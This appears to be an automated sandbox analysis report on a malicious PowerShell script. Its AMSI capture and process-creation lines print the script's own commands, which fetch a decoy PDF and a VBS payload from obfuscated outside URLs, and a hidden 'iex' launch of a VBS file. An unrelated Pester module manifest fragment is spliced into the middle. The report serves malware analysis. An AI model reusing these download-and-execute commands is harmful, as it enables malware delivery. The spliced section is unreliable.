      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: gn.pdb source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbi source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C04000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000003.00000002.2208043050.0000018BEFC3F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2320310651.000001E9AD8F8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb; source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbU source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbX source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C04000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2421070129.000001E9C7BA0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2205844898.0000018BEF989000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2206351579.0000018BEF9C9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: nt.Automation.pdb-4437-8B11-F424491E3931}\InprocSe source: powershell.exe, 00000003.00000002.2203371546.0000018BED8BA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: lib.pdbw source: powershell.exe, 00000000.00000002.2414247428.000001E9C78F0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD345400BD pushad ; iretd 3_2_00007FFD345400C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34547697 push esp; retf 3_2_00007FFD34547698
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34610D6C push eax; ret 3_2_00007FFD34610D6D

      Boot Survival

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htdc6www.astua7ntua7rprisua7s.com.pk/ms/List%20of%20rua7quirua7d%20itua7ms%20and%20sua7rvicua7s.pdf';getit -fz $flol -oulv 'http://www.bluua7maxxlasua7r.com/ms/ms.vbs';exit
      @{
      # Script module or binary module file associated with this manifest.
      ModuleToProcess = 'Pester.psm1'
      # Version number of this module.
      ModuleVersion = '3.4.0'
      # ID used to uniquely identify this module
      GUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'
      # Author of this module
      Author = 'Pester Team'
      # Company or vendor of this module
      CompanyName = 'Pester'
      # Copyright statement for this module
      Copyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'
      # Description of the functionality provided by this module
      Description = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts.
      Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'
      # Minimum version of the Windows PowerShell user required by this module
      PowerShellVersion = '2.0'
      # Functions to export from this module
      FunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')
      # # Cmdlets to export from this module
      # CmdletsToExport = '*'
      # Variables to export from this module
      VariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')
      # # Aliases to export from this module
      # AliasesToExport = '*'
      # List of all modules packaged with this module
      # ModuleList = @()
      # List of all files packaged with this module
      # FileList = @()
      PrivateData = @{
      # PSData is module packaging and gallery metadata embedded in PrivateData
      # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages
      # We had to do this because it's the only place we're allowed to extend the manifest
      # https://connect.microsoft.com/PowerShell/feedback/details/421837
      PSData = @{
      # The primary categorization of this module (from the TechNet Gallery tech tree).
      Category = "Scripting Techniques"
      # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4172
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5541
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6483
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3148
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604 | Thread sleep time: -12912720851596678s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928 | Thread sleep count: 6483 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7156 | Thread sleep count: 3148 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2748 | Thread sleep time: -6456360425798339s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 936 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-noLogo-ExecutionPolicyunrestricted-fileC:\Users\user\Desktop\raEyjKggAf.ps132\Wbem;C
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3367061290.000002AEC0A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3371106448.000002AEC6258000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: amsi64_2244.amsi.csv, type: OTHER
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2244, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
